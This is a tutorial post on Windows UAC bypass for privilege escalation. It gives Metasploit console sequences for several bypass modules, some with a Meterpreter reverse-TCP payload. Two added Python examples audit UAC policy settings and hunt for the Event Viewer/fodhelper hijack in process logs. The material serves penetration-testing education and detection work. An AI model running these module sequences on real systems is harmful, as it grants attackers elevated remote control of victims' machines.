UAC bypass privilege escalation
2022-06-23 17:06:00 【West Lake first sword】
Introduction to UAC
UAC (User Account Control) is a technology Microsoft introduced to improve system security.
UAC requires a user to have the corresponding permission or an administrator password before performing an operation that may affect how the computer runs, or before changing a setting that may affect other users. UAC authenticates the user before the operation starts,
to prevent malware and spyware from installing on the computer or modifying its settings without permission.
The security control policy defined by Microsoft is divided into three levels: high, medium and low.
High-level processes have administrator privileges; medium-level processes have ordinary administrator privileges; low-level processes have restricted permissions, so that a security threat causes the least possible damage to the system.
UAC bypass
Getting a target exe or bat executable to run remotely past this security mechanism is called BypassUAC (the executable runs directly, with no prompt window).
MSF bypassuac privilege escalation
When a session obtained as an ordinary user cannot escalate with getsystem, performing a UAC bypass first and then running getsystem again can succeed.
RunAs module
exploit/windows/local/ask
The RunAs escalation creates an executable file, and a UAC dialog pops up on the target.
When the user clicks to accept it, a reverse shell connects back, and getsystem can then be used to escalate.
msf6 exploit(windows/local/ask) > set filename windows.exe
filename => windows.exe
msf6 exploit(windows/local/ask) > set session 1
session => 1
msf6 exploit(windows/local/ask) > run
bypassuac module
exploit/windows/local/bypassuac
Bypasses Windows UAC by process injection using a trusted publisher certificate.
Make sure that the current user is in the administrators group. The module can succeed with UAC at its default settings.
msf6 exploit(windows/local/bypassuac) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac) > run
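The module description above says it can succeed when UAC is at its default settings. As an added example (not part of the original post), this Python check audits the UAC policy values in `reg query` output so a defender can see which hosts are still at that default; the sample output is constructed, and treating a missing value as its Windows default is an assumption.

```python
import re

# Constructed sample: output of
#   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# on a host left at the UAC defaults.
SAMPLE_DEFAULT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    EnableLUA    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
"""
# Constructed sample: the same host moved to "Always notify".
SAMPLE_ALWAYS_NOTIFY = SAMPLE_DEFAULT.replace("0x5", "0x2")

# Assumption: a value missing from the output is treated as its Windows default.
DEFAULTS = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1}
DWORD_LINE = re.compile(
    r"^[ \t]+(\S+)[ \t]+REG_DWORD[ \t]+0x([0-9a-fA-F]+)[ \t]*$", re.M)


def parse_reg_query(text):
    """Return {value_name: int} for every REG_DWORD line in `reg query` output."""
    return {name: int(raw, 16) for name, raw in DWORD_LINE.findall(text)}


def audit_uac(text):
    """Return (code, explanation) findings; an empty list means none was found."""
    v = {**DEFAULTS, **parse_reg_query(text)}
    findings = []
    if v["EnableLUA"] != 1:
        findings.append(("UAC_OFF", "EnableLUA is not 1: UAC is disabled"))
    if v["ConsentPromptBehaviorAdmin"] == 0:
        findings.append(("NO_PROMPT", "administrators elevate without any prompt"))
    elif v["ConsentPromptBehaviorAdmin"] == 5:
        findings.append(("DEFAULT_LEVEL", "default level: Windows binaries "
                         "auto-elevate for administrators without a prompt"))
    if v["PromptOnSecureDesktop"] != 1:
        findings.append(("NO_SECURE_DESKTOP", "prompt is not on the secure desktop"))
    return findings


if __name__ == "__main__":
    for label, sample in (("default", SAMPLE_DEFAULT),
                          ("always notify", SAMPLE_ALWAYS_NOTIFY)):
        print(label, audit_uac(sample))
```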
bypassuac_injection module
This module bypasses UAC through in-memory injection using a trusted publisher certificate (the correct architecture must be selected for the module).
msf6 exploit(windows/local/bypassuac_injection) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_injection) > set target 1
target => 1
msf6 exploit(windows/local/bypassuac_injection) > set payload windows/x64/meterpreter/reverse_tcp
bypassuac_eventvwr module
Hijacks a special key in the registry under the current user hive and inserts a custom command, which is invoked when Windows Event Viewer / fodhelper.exe is launched, thereby bypassing UAC.
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set target 1
target => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > run
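Because the technique described above makes Event Viewer or fodhelper.exe start a command of the user's choosing, it shows up in process-creation telemetry as an unexpected child of those binaries. As an added example (not part of the original post), this Python hunt flags such children in JSON-lines events that use Sysmon Event ID 1 field names; the sample events, user name and expected-child baseline are constructed assumptions.

```python
import json
import ntpath

# Auto-elevating parents named above -> child images expected in normal use.
# Assumption: this baseline is illustrative; tune it against your own telemetry.
EXPECTED_CHILDREN = {"eventvwr.exe": {"mmc.exe"}, "fodhelper.exe": set()}

# Constructed sample events (one JSON object per line, one line damaged).
SAMPLE_EVENTS = r"""
{"ParentImage": "C:\\Windows\\System32\\eventvwr.exe", "Image": "C:\\Windows\\System32\\mmc.exe", "IntegrityLevel": "High", "User": "LAB\\alice"}
{"ParentImage": "C:\\Windows\\System32\\eventvwr.exe", "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\updater.exe", "IntegrityLevel": "High", "User": "LAB\\alice"}
{"ParentImage": "C:\\Windows\\System32\\fodhelper.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "IntegrityLevel": "High", "User": "LAB\\alice"}
{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "IntegrityLevel": "Medium", "User": "LAB\\alice"}
{"ParentImage": "C:\\Windows\\System32\\fodhelper.exe", "Image":
"""


def basename(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename(path or "").lower()


def suspicious_children(jsonl):
    """Return one hit per process whose parent is a watched binary and whose
    image is not in that parent's expected-child set."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip damaged records instead of aborting the hunt
        parent, child = basename(ev.get("ParentImage")), basename(ev.get("Image"))
        if parent in EXPECTED_CHILDREN and child not in EXPECTED_CHILDREN[parent]:
            hits.append({"parent": parent, "child": child, "user": ev.get("User"),
                         "elevated": ev.get("IntegrityLevel") in ("High", "System")})
    return hits


if __name__ == "__main__":
    for hit in suspicious_children(SAMPLE_EVENTS):
        print(hit)
```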